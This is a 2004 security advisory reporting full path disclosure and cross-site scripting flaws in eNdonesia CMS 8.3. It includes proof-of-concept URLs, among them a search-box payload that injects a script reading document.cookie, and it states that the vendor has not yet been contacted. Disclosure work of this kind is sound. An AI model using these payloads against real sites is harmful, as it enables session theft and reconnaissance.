ECHO_ADV_02$2004 --------------------------------------------------------------------------- Multiple vulnerabilities in eNdonesia CMS --------------------------------------------------------------------------- Author: y3dips Date: August, 2th 2004 Location: Indonesia, Jakarta Web: http://echo.or.id/adv/adv02-y3dips-2004.txt --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ eNdonesia is a freeware content management system, written in php by Nurcholis. Homepage: http://www.endonesia.net/ download at : http://www.sourceforge.net/projects/endonesia Version : tested on endonesia 8.3 not tested on other/older version but it is possible be the same --------------------------------------------------------------------------- Vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A. Full path disclosure: A1. - all scripts in "mod.php" files are not protected against direct access Example: http://localhost/endon/mod.php?mod=1 ... and we will see standard php error messages, revealing full path to script: Warning: main(./mod/1/index.php): failed to open stream: \ No such file or directory in /var/www/html/endon/mod.php on line 3 Warning: main(): Failed opening './mod/1/index.php' for inclusion \ (include_path='.:/usr/share/pear') in /var/www/html/endon/mod.php on line 3 A2. Example: http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=%3Cb%3Etest%3C/b%3 ... and we will see standard mysql error messages, revealing full path to script in module because input character: http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=[your chararter] warning : Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /var/www/html/endon/mod/publisher/publisher.php on line 101 B. Cross-site scripting aka XSS: eNdonesia has built-in filtering against XSS exploits, so additional measures must be used for successful cross-site scripting. B1 - XSS through unsanitaized user submitted variable in mod.php http://localhost/endon/mod.php?mod=[XSS Code here]publisher&op=viewcat&cid=1 POC : http://localhost/endon/mod.php?mod=%3Ch1%3Etest-nih-publisher&op=viewcat&cid=dudul then the warning is Warning: main(./mod/ test Epublisher/index.php): failed to open stream: \ No such file or directory in /var/www/html/endon/mod.php on line 3 . ..... with "test" in

format B2. Session ID at search box http://localhost/endon/mod.php?mod=publisher&op=search&query= POC : http://localhost/endon/mod.php?mod=publisher&op=search&query=%3Cscript%3Ealert(document.cookie)%3C/script%3E or in search box, input <script>alert(document.cookie)</script> --------------------------------------------------------------------------- The fix: ~~~~~~~~ Vendor not contacted yet but i ll post it to them later --------------------------------------------------------------------------- Shoutz: ~~~~~~~ ~ echo|staff (m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to) ~ newbie_hacker@yahoogroups.com , ~ #e-c-h-o@DALNET --------------------------------------------------------------------------- Contact: ~~~~~~~~ y3dips || echo|staff || y3dips[at]phreaker[dot]net Homepage: http://y3dips.echo.or.id/ ------------------------------[ EOF ]--------------------------------------